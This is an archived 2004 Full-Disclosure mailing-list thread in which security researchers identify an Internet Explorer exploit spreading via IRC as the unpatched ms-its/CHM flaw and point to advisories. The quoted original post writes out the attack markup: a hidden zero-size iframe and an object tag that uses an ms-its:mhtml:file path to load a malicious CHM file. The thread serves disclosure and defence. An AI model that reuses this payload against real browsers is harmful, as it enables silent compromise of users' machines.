[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <8B32EDC90D8F4E4AB40918883281874D52314C@pivxwin2k1.secnet.pivx.com>
From: thor at pivx.com (Thor Larholm)
Subject: IE exploit going around on irc
The MS03-032 Object Data vulnerability dealt with improper handling of
HTA mime-types.
What Niek forwarded is using the Ibiza CHM exploit that deals with
improper privileges gained through the ms-its/ms-itss URL protocol
handlers which is still unpatched.
Roozbeh Afrasiabi on this and others:
http://www.securityfocus.com/archive/1/358913/2004-03-26/2004-04-01/0
Drew Copley:
http://www.securityfocus.com/archive/1/358914/2004-03-26/2004-04-01/0
My post in February:
http://www.securityfocus.com/archive/1/355149/2004-02-24/2004-03-01/0
Regards
Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
thor@...x.com
Phone: +1 (949) 231-8496
PGP: 0x5A276569
6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569
PivX defines "Proactive Threat Mitigation". Get a FREE Beta Version of
Qwik-Fix
<http://www.qwik-fix.net>
-----Original Message-----
From: David Jacoby [mailto:bugtraq@...p.hack.se]
Sent: Monday, April 05, 2004 11:38 PM
To: full-disclosure@...ts.netsys.com
Subject: Re: [Full-Disclosure] IE exploit going around on irc
I just found this information:
http://securityresponse.symantec.com/avcenter/venc/data/download.tagdoor
.html
"Download.Tagdoor is a group of Trojan horses that exploit the Internet
Explorer Object Tag Vulnerability. (This is described in Microsoft
Security Bulletin MS03-032. )"
((pewp))
On Mon, 2004-04-05 at 19:52, Niek Baakman wrote:
> Hi list,
>
> this thing's been going around on irc the last few days:
>
> www.divx.dc-hub.com (IE users don't click it!)
> check source:
> <iframe src='loi.htm' width=0 height=0></iframe>
>
> loi.htm contains:
> <object
>
data="ms-its:mhtml:file://C:\winhelp.mht!${PATH}/LOI.CHM::/loi.htm"
> type="text/x-scriptlet"></object>
>
>
> LOI.CHM is attached
>
> Regards,
>
> Niek Baakman
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists